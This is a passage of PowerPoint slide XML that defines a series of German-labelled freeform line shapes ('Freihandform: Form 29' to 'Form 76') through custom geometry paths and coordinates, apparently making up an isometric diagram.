              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="479926" h="332713">
                  <a:moveTo>
                    <a:pt x="383954" y="-2896"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="218882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="329817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479928" y="52571"/>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0" name="Freihandform: Form 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBA3702B-B172-46F9-BC07-A2C1AA22A603}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6314072" y="1824036"/>
              <a:ext cx="23469" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 218836 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -2942 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="221777">
                  <a:moveTo>
                    <a:pt x="1" y="218836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2942"/>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1" name="Freihandform: Form 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC0E2544-12C2-4155-BE20-DEEB3F62B8CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6550572" y="1687366"/>
              <a:ext cx="23469" cy="819790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ -2942 h 332713"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ 329771 h 332713"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="332713">
                  <a:moveTo>
                    <a:pt x="1" y="-2942"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="329771"/>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2" name="Freihandform: Form 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CFA5EB-B323-4BE2-8998-C2AF8393A95A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6077549" y="2097141"/>
              <a:ext cx="236520" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ -2936 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ 52532 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-2936"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95994" y="52532"/>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48" name="Freihandform: Form 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CCF77A4-259C-467A-8300-0B317DAC0382}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6315057" y="1550222"/>
              <a:ext cx="235513" cy="137141"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95583"/>
                <a:gd name="connsiteY0" fmla="*/ 52677 h 55659"/>
                <a:gd name="connsiteX1" fmla="*/ 95584 w 95583"/>
                <a:gd name="connsiteY1" fmla="*/ -2983 h 55659"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95583" h="55659">
                  <a:moveTo>
                    <a:pt x="1" y="52677"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95584" y="-2983"/>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54" name="Freihandform: Form 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CB9DE4-F452-45D8-B4C0-A9F762336B69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8442660" y="2507390"/>
              <a:ext cx="236592" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY0" fmla="*/ 52472 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 96022 w 96021"/>
                <a:gd name="connsiteY1" fmla="*/ -2901 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96021" h="55373">
                  <a:moveTo>
                    <a:pt x="1" y="52472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96022" y="-2901"/>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55" name="Freihandform: Form 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D83626-E289-4BCE-A8D9-D438F5E0EC50}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8442635" y="2369312"/>
              <a:ext cx="473043" cy="410951"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96013 w 191985"/>
                <a:gd name="connsiteY0" fmla="*/ 163884 h 166785"/>
                <a:gd name="connsiteX1" fmla="*/ 191987 w 191985"/>
                <a:gd name="connsiteY1" fmla="*/ 107941 h 166785"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 191985"/>
                <a:gd name="connsiteY2" fmla="*/ -2901 h 166785"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191985" h="166785">
                  <a:moveTo>
                    <a:pt x="96013" y="163884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191987" y="107941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2901"/>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56" name="Freihandform: Form 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78596CA1-F564-4E90-9A59-E34C2A8CD41D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8679230" y="2643826"/>
              <a:ext cx="473115" cy="273110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 192016 w 192014"/>
                <a:gd name="connsiteY0" fmla="*/ 107958 h 110842"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 192014"/>
                <a:gd name="connsiteY1" fmla="*/ -2884 h 110842"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192014" h="110842">
                  <a:moveTo>
                    <a:pt x="192016" y="107958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-288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57" name="Freihandform: Form 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2F19387-F524-414C-8BC9-31CDE6B2E2E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260117" y="1277351"/>
              <a:ext cx="472997" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191968 w 191966"/>
                <a:gd name="connsiteY0" fmla="*/ 107935 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 191966"/>
                <a:gd name="connsiteY1" fmla="*/ -3000 h 110935"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191966" h="110935">
                  <a:moveTo>
                    <a:pt x="191968" y="107935"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-300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58" name="Freihandform: Form 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D61CF09-4C1E-422E-8C35-10E60C1152F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260070" y="2097141"/>
              <a:ext cx="709566" cy="410012"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287980 w 287978"/>
                <a:gd name="connsiteY0" fmla="*/ -2925 h 166404"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 287978"/>
                <a:gd name="connsiteY1" fmla="*/ 163480 h 166404"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287978" h="166404">
                  <a:moveTo>
                    <a:pt x="287980" y="-2925"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="16348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59" name="Freihandform: Form 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71354787-C50C-498C-9141-8B49D1EF5C72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260070" y="1550692"/>
              <a:ext cx="47" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 20 w 19"/>
                <a:gd name="connsiteY0" fmla="*/ 218812 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 19"/>
                <a:gd name="connsiteY1" fmla="*/ -2965 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="19" h="221777">
                  <a:moveTo>
                    <a:pt x="20" y="218812"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2965"/>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60" name="Freihandform: Form 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFDD9891-77B0-4DD9-9BB3-80735F6DE126}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7496615" y="1960239"/>
              <a:ext cx="709566" cy="410246"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287980 w 287978"/>
                <a:gd name="connsiteY0" fmla="*/ -2936 h 166499"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 287978"/>
                <a:gd name="connsiteY1" fmla="*/ 163563 h 166499"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287978" h="166499">
                  <a:moveTo>
                    <a:pt x="287980" y="-2936"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="163563"/>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61" name="Freihandform: Form 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0933C3-4E28-47B4-8AB0-CBA076C6073C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6550572" y="1414024"/>
              <a:ext cx="473090" cy="819790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191892 w 192004"/>
                <a:gd name="connsiteY0" fmla="*/ 329748 h 332713"/>
                <a:gd name="connsiteX1" fmla="*/ 192006 w 192004"/>
                <a:gd name="connsiteY1" fmla="*/ 107972 h 332713"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 192004"/>
                <a:gd name="connsiteY2" fmla="*/ -2965 h 332713"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192004" h="332713">
                  <a:moveTo>
                    <a:pt x="191892" y="329748"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="192006" y="107972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2965"/>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62" name="Freihandform: Form 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F997F1-4836-481A-9615-23383985416E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6550572" y="1277351"/>
              <a:ext cx="236520" cy="683117"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95984 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ 274261 h 277244"/>
                <a:gd name="connsiteX1" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ 52484 h 277244"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY2" fmla="*/ -2983 h 277244"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="277244">
                  <a:moveTo>
                    <a:pt x="95984" y="274261"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95994" y="52484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2983"/>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63" name="Freihandform: Form 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2362D833-241D-4520-B1B6-6A4EFB1D23CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7496615" y="1823802"/>
              <a:ext cx="236520" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ 52414 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ -2960 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="55373">
                  <a:moveTo>
                    <a:pt x="95994" y="52414"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-296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64" name="Freihandform: Form 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3BFCBB-995C-4E2F-8115-FC07804728FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7023594" y="2233814"/>
              <a:ext cx="473090" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 192006 w 192004"/>
                <a:gd name="connsiteY0" fmla="*/ 52544 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95975 w 192004"/>
                <a:gd name="connsiteY1" fmla="*/ -2925 h 55468"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 192004"/>
                <a:gd name="connsiteY2" fmla="*/ 52544 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192004" h="55468">
                  <a:moveTo>
                    <a:pt x="192006" y="52544"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95975" y="-2925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="5254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70" name="Freihandform: Form 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0493797B-18C7-436B-BDAC-80B17CA739A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260117" y="1550692"/>
              <a:ext cx="236545" cy="409546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96002"/>
                <a:gd name="connsiteY0" fmla="*/ 163244 h 166215"/>
                <a:gd name="connsiteX1" fmla="*/ 96003 w 96002"/>
                <a:gd name="connsiteY1" fmla="*/ 107776 h 166215"/>
                <a:gd name="connsiteX2" fmla="*/ 95984 w 96002"/>
                <a:gd name="connsiteY2" fmla="*/ -2971 h 166215"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96002" h="166215">
                  <a:moveTo>
                    <a:pt x="1" y="163244"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96003" y="107776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95984" y="-2971"/>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71" name="Freihandform: Form 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8C525AB-8C90-41D8-BC7C-CD71BDC6CDCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7496662" y="1550692"/>
              <a:ext cx="236498" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95983"/>
                <a:gd name="connsiteY0" fmla="*/ -2983 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95985 w 95983"/>
                <a:gd name="connsiteY1" fmla="*/ 52486 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95983" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-2983"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95985" y="52486"/>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72" name="Freihandform: Form 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430AC8BA-6026-44AB-B936-0D94B48748E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7733185" y="1960468"/>
              <a:ext cx="236663" cy="136437"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96051 w 96050"/>
                <a:gd name="connsiteY0" fmla="*/ 52425 h 55373"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 96050"/>
                <a:gd name="connsiteY1" fmla="*/ -2948 h 55373"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96050" h="55373">
                  <a:moveTo>
                    <a:pt x="96051" y="52425"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-294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73" name="Freihandform: Form 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4297D90D-823E-415F-97DE-B0BD6AF53F26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8206208" y="457556"/>
              <a:ext cx="236427" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 11 w 95954"/>
                <a:gd name="connsiteY0" fmla="*/ 107867 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 95956 w 95954"/>
                <a:gd name="connsiteY1" fmla="*/ 52399 h 110937"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 95954"/>
                <a:gd name="connsiteY2" fmla="*/ -3070 h 110937"/>
                <a:gd name="connsiteX3" fmla="*/ 11 w 95954"/>
                <a:gd name="connsiteY3" fmla="*/ 107867 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95954" h="110937">
                  <a:moveTo>
                    <a:pt x="11" y="107867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95956" y="52399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="107867"/>
                  </a:lnTo>
                  <a:close/>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77" name="Freihandform: Form 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
